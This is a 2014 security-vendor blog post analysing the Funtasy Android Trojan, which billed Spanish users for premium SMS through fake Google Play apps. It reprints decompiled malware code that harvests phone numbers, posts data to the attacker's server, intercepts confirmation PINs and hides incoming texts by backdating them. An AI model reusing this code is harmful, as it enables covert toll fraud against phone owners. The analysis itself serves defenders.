[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.com/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/)  
Menu

* [Tools](https://unit42.paloaltonetworks.com/tools/)
* [ATOMs](https://unit42.paloaltonetworks.com/atoms/)
* [Security Consulting](https://www.paloaltonetworks.com/unit42)
* [About Us](https://unit42.paloaltonetworks.com/about-unit-42/)
* [**Under Attack?**](https://start.paloaltonetworks.com/contact-unit42.html)
* [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research")
* [High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/ "High Profile Threats")
* [Malware](https://unit42.paloaltonetworks.com/category/malware/ "Malware")  
  [Malware](https://unit42.paloaltonetworks.com/category/malware/)

# Funtasy Trojan Targets Spanish Android Users with Sneaky SMS Charges

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 8 min read

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  By:
  
  * [Zhi Xu](https://unit42.paloaltonetworks.com/author/zhi-xu/)
  * [Claud Xiao](https://unit42.paloaltonetworks.com/author/claud-xiao/)
  * [Ryan Olson](https://unit42.paloaltonetworks.com/author/ryan-olson/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  Published:May 12, 2014

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  Categories:
  
  * [High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/)
  * [Malware](https://unit42.paloaltonetworks.com/category/malware/)
  * [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  Tags:
  
  * [Android](https://unit42.paloaltonetworks.com/tag/android/)
  * [Funtasy](https://unit42.paloaltonetworks.com/tag/funtasy/)
  * [Trojan](https://unit42.paloaltonetworks.com/tag/trojan/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/funtasy-trojan-targets-spanish-android-users-sneaky-sms-charges/?pdf=download&lg=en&_wpnonce=7680ed8473 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/funtasy-trojan-targets-spanish-android-users-sneaky-sms-charges/?pdf=print&lg=en&_wpnonce=7680ed8473 "Click here to print")

Share![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=Funtasy%20Trojan%20Targets%20Spanish%20Android%20Users%20with%20Sneaky%20SMS%20Charges&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Ffuntasy-trojan-targets-spanish-android-users-sneaky-sms-charges%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Ffuntasy-trojan-targets-spanish-android-users-sneaky-sms-charges%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Ffuntasy-trojan-targets-spanish-android-users-sneaky-sms-charges%2F&title=Funtasy%20Trojan%20Targets%20Spanish%20Android%20Users%20with%20Sneaky%20SMS%20Charges "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Ffuntasy-trojan-targets-spanish-android-users-sneaky-sms-charges%2F&text=Funtasy%20Trojan%20Targets%20Spanish%20Android%20Users%20with%20Sneaky%20SMS%20Charges "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Ffuntasy-trojan-targets-spanish-android-users-sneaky-sms-charges%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=Funtasy%20Trojan%20Targets%20Spanish%20Android%20Users%20with%20Sneaky%20SMS%20Charges%20https%3A%2F%2Funit42.paloaltonetworks.com%2Ffuntasy-trojan-targets-spanish-android-users-sneaky-sms-charges%2F "Share in Mastodon")

### Summary

* A new Android Trojan, named Funtasy, began targeting Spanish Android users in mid-April.
* Users have downloaded 18 different variants of Funtasy between 13,500 and 67,000 times from the Google Play store.
* Funtasy currently targets users of multiple Spanish mobile networks, and one Australian mobile network.
* Funtasy subscribes victim's phones to premium SMS services which cost up to 30 euros per month, while hiding the evidence of the subscription.

### Let the Funtasy Begin

Palo Alto Networks WildFire detected a new Android Trojan on May 7th, 2014 when a customer using our enterprise security platform downloaded the malicious application from the Google Play store. We've named the malware family Funtasy, based on the domain it uses for registering compromised phones to the premium SMS service. The first version of Funtasy we detected is a fake television remote control application.

![pic 1](http://blog.paloaltonetworks.com/wp-content/uploads/2014/05/pic-1-500x155.png)

Figure 1: Funtasy Trojan Disguised as TV Remote Control App.

A developer using the ID "fun app" published the Trojan, and the remote control application they uploaded on April 21 is their most successful app so far, with between 10,000 and 50,000 downloads on the play store. Based on the reviews, the application does not function very well as a remote, but in reality it doesn't contain remote control capability. There's no mention of a premium SMS service in the description, but a review of the permissions reveals that the program will have complete access to SMS messages.

![pic 2](http://blog.paloaltonetworks.com/wp-content/uploads/2014/05/pic-2-500x309.png)

Figure 2: Remote control app requests complete control over your SMS messages.

After the user installs the remote application and opens it, they are presented with a terms of service screen. This is the user's only chance to realize that opening this application is going to cost them dearly.

![pic 3](http://blog.paloaltonetworks.com/wp-content/uploads/2014/05/pic-3-500x833.png)

Figure 3: Remote control app terms of service.

If you can't read the fine print, I don't blame you. Here's the text decoded from the application's source code.

*Servicio de suscripción para usuarios Movistar, Vodafone, Orange, Yoigo, R y Simyo para mayores de edad o menores con capacidad legal para contratar, prestados por (FUNTASY MOBILE S.L., operador titular ARGATEL SOLUTIONS SL, n. atención al cliente 902 303 803 ó inf@argatel.com, apartado de correos 167, 17001 Girona. Coste por SMS recibido 1.46 euros/sms (IVA incluido) más el coste de navegación WAP, que dependerá del operador que tenga contratado. Máximo 10 sms/semana. El límite máximo de facturación del servicio puede variar en función de tu operador (18 a 30 euros/mes). Baja automática para cancelar el servicio: envía BAJA al 797977.*

This message is pretty straightforward, assuming the user actually reads it. It explains that by opening the application the reader agrees to receive up to 10 SMS messages a week at a cost of 1.46 euros each. The maximum cost per month should between 18 and 30 euros per month. If the user would like to unsubscribe they can text "BAJA" to 797977. Any user who reads this message and understands it is unlikely to agree, but Funtasy does not even wait for their agreement.

While the terms page is on the screen, in the background the Trojan checks to see if the phone is attached to a network with one of the following mobile network codes (MNC):

* 21401: Vodafone Spain
* 21403: France Telecom España SA
* 21404: Xfera Moviles SA
* 21406: Vodafone Spain
* 21407: Telefónica Móviles España
* 21416: Telecable de Asturias S.A.U.
* 21417: R Cable y Telecomunicaciones Galicia S.A.
* 21418: Cableuropa S.A.U.
* 21419: E-PLUS Moviles Virtuales España S.L.U.
* 21421: Jazz Telecom S.A.U.
* 50503: Vodafone Hutchison Australia Proprietary Limited

Each of these networks is Spanish, except for a single Australian network. This data, along with an encoded version of the Terms of Service are stored as static strings in the Android package file.

*Constants.java*  
package com.lasmejoresapps.tvremotecontrol; public class Constants { public static final String AUSTRALIA\_COUNTRY\_CODE = "505"; public static final String GOSMSPRO = "com.jb.gosms"; public static final String HANDCENTSMS = "com.handcent.nextsms"; public static final String HANGOUTS = "com.google.android.talk"; public static final String JAZZTEL\_OPERATOR = "JAZZTEL"; public static final String JAZZTEL\_OPERATOR\_CODE = "21421"; public static final String MIO\_OPERATOR\_CODE = "50503"; public static final String MOVISTAR\_OPERATOR = "MOVISTAR"; public static final String MOVISTAR\_OPERATOR\_CODE = "21407"; public static final String MOVISTAR\_OPERATOR\_CODE\_PHP = "364"; public static final String ONO\_OPERATOR\_CODE = "21418"; public static final String ORANGE\_OPERATOR = "ORANGE"; public static final String ORANGE\_OPERATOR\_CODE = "21403"; public static final String ORANGE\_OPERATOR\_CODE\_PHP = "363"; public static final String ORIGIN\_SMS = "Nzk3OTc3"; public static final String PEPEPHONE\_OPERATOR\_CODE = "21406"; public static final String R\_OPERATOR\_CODE = "21417"; public static final String R\_OPERATOR\_CODE\_PHP = "368"; public static final String SECRET\_FILE = "configuration\_2"; public static final String SIMYO\_OPERATOR = "SIMYO"; public static final String SIMYO\_OPERATOR\_CODE = "21419"; public static final String SIMYO\_OPERATOR\_CODE\_PHP = "367"; public static final String SPAIN\_COUNTRY\_CODE = "214"; public static final String TELECABLE\_OPERATOR\_CODE = "21416"; public static final String TELECABLE\_OPERATOR\_CODE\_PHP = "369"; public static final String TELEGRAM1 = "org.telegram.messenger.account"; public static final String TELEGRAM2 = "org.telegram.account"; public static final String TERMS = "U2VydmljaW8gZGUgc3VzY3JpcGNpw7NuIHBhcmEgdXN1YXJpb3MgTW92aXN0YXIsIFZvZGFmb25lLCBPcmFuZ2UsIFlvaWdvLCBSIHkgU2lteW8gcGFyYSBtYXlvcmVzIGRlIGVkYWQgbyBtZW5vcmVzIGNvbiBjYXBhY2lkYWQgbGVnYWwgcGFyYSBjb250cmF0YXIsIHByZXN0YWRvcyBwb3IgKEZVTlRBU1kgTU9CSUxFIFMuTC4sIG9wZXJhZG9yIHRpdHVsYXIgQVJHQVRFTCBTT0xVVElPTlMgU0wsIG4uIGF0ZW5jacOzbiBhbCBjbGllbnRlIDkwMiAzMDMgODAzIMOzIGluZkBhcmdhdGVsLmNvbSwgYXBhcnRhZG8gZGUgY29ycmVvcyAxNjcsIDE3MDAxIEdpcm9uYS4gQ29zdGUgcG9yIFNNUyByZWNpYmlkbyAxLjQ2IGV1cm9zL3NtcyAoSVZBIGluY2x1aWRvKSBtw6FzIGVsIGNvc3RlIGRlIG5hdmVnYWNpw7NuIFdBUCwgcXVlIGRlcGVuZGVyw6EgZGVsIG9wZXJhZG9yIHF1ZSB0ZW5nYSBjb250cmF0YWRvLiBNw6F4aW1vIDEwIHNtcy9zZW1hbmEuIEVsIGzDrW1pdGUgbcOheGltbyBkZSBmYWN0dXJhY2nDs24gZGVsIHNlcnZpY2lvIHB1ZWRlIHZhcmlhciBlbiBmdW5jacOzbiBkZSB0dSBvcGVyYWRvciAoMTggYSAzMCBldXJvcy9tZXMpLiBCYWphIGF1dG9tw6F0aWNhIHBhcmEgY2FuY2VsYXIgZWwgc2VydmljaW86IGVudsOtYSBCQUpBIGFsIDc5Nzk3Ny4="; public static final String TEXTSECURE = "org.thoughtcrime.securesms"; public static final String URL = "aHR0cDovL2Z1bnRhc3ltb2JpbGUuY29tL2FsZXJ0YXNfYWx0YV93ZWIucGhw"; public static final String VODAFONE\_OPERATOR = "VODAFONE ES"; public static final String VODAFONE\_OPERATOR\_CODE = "21401"; public static final String VODAFONE\_OPERATOR\_CODE\_PHP = "365"; public static final String WHATSAPP = "com.whatsapp"; public static final String YOIGO\_OPERATOR = "YOIGO"; public static final String YOIGO\_OPERATOR\_CODE = "21404"; public static final String YOIGO\_OPERATOR\_CODE\_PHP = "55"; public Constants() { super(); } }

|-------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 | package com.lasmejoresapps.tvremotecontrol; public class Constants { public static final String AUSTRALIA\_COUNTRY\_CODE = "505"; public static final String GOSMSPRO = "com.jb.gosms"; public static final String HANDCENTSMS = "com.handcent.nextsms"; public static final String HANGOUTS = "com.google.android.talk"; public static final String JAZZTEL\_OPERATOR = "JAZZTEL"; public static final String JAZZTEL\_OPERATOR\_CODE = "21421"; public static final String MIO\_OPERATOR\_CODE = "50503"; public static final String MOVISTAR\_OPERATOR = "MOVISTAR"; public static final String MOVISTAR\_OPERATOR\_CODE = "21407"; public static final String MOVISTAR\_OPERATOR\_CODE\_PHP = "364"; public static final String ONO\_OPERATOR\_CODE = "21418"; public static final String ORANGE\_OPERATOR = "ORANGE"; public static final String ORANGE\_OPERATOR\_CODE = "21403"; public static final String ORANGE\_OPERATOR\_CODE\_PHP = "363"; public static final String ORIGIN\_SMS = "Nzk3OTc3"; public static final String PEPEPHONE\_OPERATOR\_CODE = "21406"; public static final String R\_OPERATOR\_CODE = "21417"; public static final String R\_OPERATOR\_CODE\_PHP = "368"; public static final String SECRET\_FILE = "configuration\_2"; public static final String SIMYO\_OPERATOR = "SIMYO"; public static final String SIMYO\_OPERATOR\_CODE = "21419"; public static final String SIMYO\_OPERATOR\_CODE\_PHP = "367"; public static final String SPAIN\_COUNTRY\_CODE = "214"; public static final String TELECABLE\_OPERATOR\_CODE = "21416"; public static final String TELECABLE\_OPERATOR\_CODE\_PHP = "369"; public static final String TELEGRAM1 = "org.telegram.messenger.account"; public static final String TELEGRAM2 = "org.telegram.account"; public static final String TERMS = "U2VydmljaW8gZGUgc3VzY3JpcGNpw7NuIHBhcmEgdXN1YXJpb3MgTW92aXN0YXIsIFZvZGFmb25lLCBPcmFuZ2UsIFlvaWdvLCBSIHkgU2lteW8gcGFyYSBtYXlvcmVzIGRlIGVkYWQgbyBtZW5vcmVzIGNvbiBjYXBhY2lkYWQgbGVnYWwgcGFyYSBjb250cmF0YXIsIHByZXN0YWRvcyBwb3IgKEZVTlRBU1kgTU9CSUxFIFMuTC4sIG9wZXJhZG9yIHRpdHVsYXIgQVJHQVRFTCBTT0xVVElPTlMgU0wsIG4uIGF0ZW5jacOzbiBhbCBjbGllbnRlIDkwMiAzMDMgODAzIMOzIGluZkBhcmdhdGVsLmNvbSwgYXBhcnRhZG8gZGUgY29ycmVvcyAxNjcsIDE3MDAxIEdpcm9uYS4gQ29zdGUgcG9yIFNNUyByZWNpYmlkbyAxLjQ2IGV1cm9zL3NtcyAoSVZBIGluY2x1aWRvKSBtw6FzIGVsIGNvc3RlIGRlIG5hdmVnYWNpw7NuIFdBUCwgcXVlIGRlcGVuZGVyw6EgZGVsIG9wZXJhZG9yIHF1ZSB0ZW5nYSBjb250cmF0YWRvLiBNw6F4aW1vIDEwIHNtcy9zZW1hbmEuIEVsIGzDrW1pdGUgbcOheGltbyBkZSBmYWN0dXJhY2nDs24gZGVsIHNlcnZpY2lvIHB1ZWRlIHZhcmlhciBlbiBmdW5jacOzbiBkZSB0dSBvcGVyYWRvciAoMTggYSAzMCBldXJvcy9tZXMpLiBCYWphIGF1dG9tw6F0aWNhIHBhcmEgY2FuY2VsYXIgZWwgc2VydmljaW86IGVudsOtYSBCQUpBIGFsIDc5Nzk3Ny4="; public static final String TEXTSECURE = "org.thoughtcrime.securesms"; public static final String URL = "aHR0cDovL2Z1bnRhc3ltb2JpbGUuY29tL2FsZXJ0YXNfYWx0YV93ZWIucGhw"; public static final String VODAFONE\_OPERATOR = "VODAFONE ES"; public static final String VODAFONE\_OPERATOR\_CODE = "21401"; public static final String VODAFONE\_OPERATOR\_CODE\_PHP = "365"; public static final String WHATSAPP = "com.whatsapp"; public static final String YOIGO\_OPERATOR = "YOIGO"; public static final String YOIGO\_OPERATOR\_CODE = "21404"; public static final String YOIGO\_OPERATOR\_CODE\_PHP = "55"; public Constants() { super(); } } |

After determining the phone is on one of the correct networks, the malware searches for the phone's mobile number. It does this in three ways:

* Invoking the TelephonyManager's getLine1Number() method.
* Traversing the phones call logs and parsing the phones outgoing number.
* Searching the phone for account numbers associated with messaging apps WhatsApp and Telegram. If a user has registered with one of these applications using a number not associated with the phone, that number will be used by Funtasy.

*Util.java*  
private static String getPhoneNumberFromAccounts(Context context) throws Exception { String v2; int v8; Account\[\] v1; Log.i("Util", "begin method getPhoneNumberFromAccounts"); String v7 = null; try { v1 = AccountManager.get(context).getAccounts(); String v5 = "telegram"; int v9 = v1.length; v8 = 0; } catch(Exception v6) { goto label\_46; } while(true) { if(v8 \>= v9) { goto label\_10; } try { Account v0 = v1\[v8\]; v2 = v0.name; String v3 = v0.type; if(!v3.equals("com.whatsapp")) { if(!v3.equals("org.telegram.messenger.account") \&\& !v3.equals("org.telegram.account") \&\& !v3.contains(((CharSequence)v5))) { goto label\_37; } break; } else if(!v2.equals("WhatsApp") \&\& (Util.isANumber(v2))) { v7 = Util.formatPhoneNumber(v2); goto label\_10; } } catch(Exception v6) { goto label\_46; } label\_37: ++v8; } try { v7 = Util.formatPhoneNumber(v2); } catch(Exception v6) { label\_46: Log.e("Util", "error method getPhoneNumberFromAccounts: " + v6.getMessage()); v6.printStackTrace(); } label\_10: Log.i("Util", "end method getPhoneNumberFromAccounts"); return v7; }

|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 | private static String getPhoneNumberFromAccounts(Context context) throws Exception { String v2; int v8; Account\[\] v1; Log.i("Util", "begin method getPhoneNumberFromAccounts"); String v7 = null; try { v1 = AccountManager.get(context).getAccounts(); String v5 = "telegram"; int v9 = v1.length; v8 = 0; } catch(Exception v6) { goto label\_46; } while(true) { if(v8 \>= v9) { goto label\_10; } try { Account v0 = v1\[v8\]; v2 = v0.name; String v3 = v0.type; if(!v3.equals("com.whatsapp")) { if(!v3.equals("org.telegram.messenger.account") \&\& !v3.equals("org.telegram.account") \&\& !v3.contains(((CharSequence)v5))) { goto label\_37; } break; } else if(!v2.equals("WhatsApp") \&\& (Util.isANumber(v2))) { v7 = Util.formatPhoneNumber(v2); goto label\_10; } } catch(Exception v6) { goto label\_46; } label\_37: ++v8; } try { v7 = Util.formatPhoneNumber(v2); } catch(Exception v6) { label\_46: Log.e("Util", "error method getPhoneNumberFromAccounts: " + v6.getMessage()); v6.printStackTrace(); } label\_10: Log.i("Util", "end method getPhoneNumberFromAccounts"); return v7; } |

With the phone's number captured, Funtasy then registers the mobile account with a premium SMS service by sending an HTTP POST request to the following URL.

* http://funtasymobile.com/alertas\_alta\_web.php

The request is made without the users knowledge, they have no choice to select a number. Of course, premium SMS services require that the user confirm that they want to sign up by sending incoming SMS message containing a PIN. Funtasy intercepts this message, parses out the PIN and sends it back to the registration server, completing the enrollment process.

*IncomingSms.java*  
package com.lasmejoresapps.tvremotecontrol; import android.content.BroadcastReceiver; import android.content.ContentValues; import android.content.Context; import android.content.Intent; import android.net.Uri; import android.os.Bundle; import android.telephony.SmsMessage; import android.util.Log; public class IncomingSms extends BroadcastReceiver { private static final String TAG = "IncomingSms"; private String operator; private String paso; private String phoneNumber; private String pin; private String url; public IncomingSms() { super(); } private void changeSms(Context context, Intent intent) throws Exception { int v5; long v2; String v0; String v8; Log.i("IncomingSms", "begin method changeSms"); try { Bundle v1 = intent.getExtras(); v8 = ""; v0 = ""; v2 = 0; if(v1 == null) { goto label\_38; } Object v7 = v1.get("pdus"); SmsMessage\[\] v6 = new SmsMessage\[v7.length\]; v5 = 0; while(true) { label\_14: if(v5 \>= v6.length) { goto label\_16; } v6\[v5\] = SmsMessage.createFromPdu(v7\[v5\]); v8 = String.valueOf(v8) + v6\[v5\].getOriginatingAddress(); v0 = String.valueOf(v0) + v6\[v5\].getMessageBody(); v2 = v6\[v5\].getTimestampMillis(); if(v0 != null \&\& !v0.equals("") \&\& (v8.equals(Util.decode("Nzk3OTc3")))) { this.pin = this.getPinFromSms(v0); } break; } } catch(Exception v4) { goto label\_78; } ++v5; goto label\_14; try { label\_16: this.stopSms(); ContentValues v9 = new ContentValues(); v9.put("address", v8); v9.put("body", v0); v9.put("read", Integer.valueOf(1)); v9.put("date", Double.valueOf((((double)v2)) - 1296000000 + 15240000)); context.getContentResolver().insert(Uri.parse("content://sms/inbox"), v9); } catch(Exception v4) { label\_78: Log.e("IncomingSms", "error method changeSms: " + v4.getMessage()); v4.printStackTrace(); } label\_38: Log.i("IncomingSms", "end method changeSms"); } private String getPinFromSms(String message) throws Exception { String v1; Log.i("IncomingSms", "begin method getPinFromSms"); try { v1 = Util.extractNumber(message); } catch(Exception v0) { Log.i("IncomingSms", "error method getPinFromSms: " + v0.getMessage()); v0.printStackTrace(); } Log.i("IncomingSms", "end method getPinFromSms"); return v1; } private void muteNotification(Context context) throws Exception { Log.i("IncomingSms", "begin method muteNotification"); try { context.getSystemService("audio").setStreamMute(5, true); } catch(Exception v1) { Log.e("IncomingSms", "error method muteNotification: " + v1.getMessage()); v1.printStackTrace(); } Log.i("IncomingSms", "end method muteNotification"); } public void onReceive(Context context, Intent intent) { Log.i("IncomingSms", "begin method onReceive"); try { this.muteNotification(context); this.changeSms(context, intent); Context v1 = context.getApplicationContext(); this.phoneNumber = ((Request)v1).getPhoneNumber(); this.paso = "3"; this.operator = ((Request)v1).getOperator(); ((Request)v1).setPin(this.pin); new SendPostReqAsync().execute(new String\[\]{Util.decode("aHR0cDovL2Z1bnRhc3ltb2JpbGUuY29tL2FsZXJ0YXNfYWx0YV93ZWIucGhw"), this.phoneNumber, this.operator, this.paso, this.pin}); } catch(Exception v0) { Log.e("IncomingSms", "error method onReceive: " + v0.getMessage()); v0.printStackTrace(); } Log.i("IncomingSms", "end method onReceive"); } private void stopSms() throws Exception { Log.i("IncomingSms", "begin method stopSms"); try { this.abortBroadcast(); } catch(Exception v0) { Log.e("IncomingSms", "error method stopSms: " + v0.getMessage()); v0.printStackTrace(); } Log.i("IncomingSms", "end method stopSms"); } }

|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 | package com.lasmejoresapps.tvremotecontrol; import android.content.BroadcastReceiver; import android.content.ContentValues; import android.content.Context; import android.content.Intent; import android.net.Uri; import android.os.Bundle; import android.telephony.SmsMessage; import android.util.Log; public class IncomingSms extends BroadcastReceiver { private static final String TAG = "IncomingSms"; private String operator; private String paso; private String phoneNumber; private String pin; private String url; public IncomingSms() { super(); } private void changeSms(Context context, Intent intent) throws Exception { int v5; long v2; String v0; String v8; Log.i("IncomingSms", "begin method changeSms"); try { Bundle v1 = intent.getExtras(); v8 = ""; v0 = ""; v2 = 0; if(v1 == null) { goto label\_38; } Object v7 = v1.get("pdus"); SmsMessage\[\] v6 = new SmsMessage\[v7.length\]; v5 = 0; while(true) { label\_14: if(v5 \>= v6.length) { goto label\_16; } v6\[v5\] = SmsMessage.createFromPdu(v7\[v5\]); v8 = String.valueOf(v8) + v6\[v5\].getOriginatingAddress(); v0 = String.valueOf(v0) + v6\[v5\].getMessageBody(); v2 = v6\[v5\].getTimestampMillis(); if(v0 != null \&\& !v0.equals("") \&\& (v8.equals(Util.decode("Nzk3OTc3")))) { this.pin = this.getPinFromSms(v0); } break; } } catch(Exception v4) { goto label\_78; } ++v5; goto label\_14; try { label\_16: this.stopSms(); ContentValues v9 = new ContentValues(); v9.put("address", v8); v9.put("body", v0); v9.put("read", Integer.valueOf(1)); v9.put("date", Double.valueOf((((double)v2)) - 1296000000 + 15240000)); context.getContentResolver().insert(Uri.parse("content://sms/inbox"), v9); } catch(Exception v4) { label\_78: Log.e("IncomingSms", "error method changeSms: " + v4.getMessage()); v4.printStackTrace(); } label\_38: Log.i("IncomingSms", "end method changeSms"); } private String getPinFromSms(String message) throws Exception { String v1; Log.i("IncomingSms", "begin method getPinFromSms"); try { v1 = Util.extractNumber(message); } catch(Exception v0) { Log.i("IncomingSms", "error method getPinFromSms: " + v0.getMessage()); v0.printStackTrace(); } Log.i("IncomingSms", "end method getPinFromSms"); return v1; } private void muteNotification(Context context) throws Exception { Log.i("IncomingSms", "begin method muteNotification"); try { context.getSystemService("audio").setStreamMute(5, true); } catch(Exception v1) { Log.e("IncomingSms", "error method muteNotification: " + v1.getMessage()); v1.printStackTrace(); } Log.i("IncomingSms", "end method muteNotification"); } public void onReceive(Context context, Intent intent) { Log.i("IncomingSms", "begin method onReceive"); try { this.muteNotification(context); this.changeSms(context, intent); Context v1 = context.getApplicationContext(); this.phoneNumber = ((Request)v1).getPhoneNumber(); this.paso = "3"; this.operator = ((Request)v1).getOperator(); ((Request)v1).setPin(this.pin); new SendPostReqAsync().execute(new String\[\]{Util.decode("aHR0cDovL2Z1bnRhc3ltb2JpbGUuY29tL2FsZXJ0YXNfYWx0YV93ZWIucGhw"), this.phoneNumber, this.operator, this.paso, this.pin}); } catch(Exception v0) { Log.e("IncomingSms", "error method onReceive: " + v0.getMessage()); v0.printStackTrace(); } Log.i("IncomingSms", "end method onReceive"); } private void stopSms() throws Exception { Log.i("IncomingSms", "begin method stopSms"); try { this.abortBroadcast(); } catch(Exception v0) { Log.e("IncomingSms", "error method stopSms: " + v0.getMessage()); v0.printStackTrace(); } Log.i("IncomingSms", "end method stopSms"); } } |

Of course, once users begin receiving the SMS messages, they are likely to unsubscribe from the service they never really wanted. To prevent this, Funtasy blocks the incoming messages before they are displayed to the user and modifies the time stamp on each message to make them appear to have been received 15 days earlier. This moves it to the back of the inbox there the victim is unlikely to ever see it. Funtasy does this even when the victim uses alternative SMS managers, like Google Hangouts or GO SMS Pro.

### Oscar Sanchez

After evaluating the remote control app and finding malicious behavior, we decided to evaluate all of the other applications published by "fun app", and found 12 more which all contains the exact same behavior.

![pic 4](http://blog.paloaltonetworks.com/wp-content/uploads/2014/05/pic-4-500x245.png)

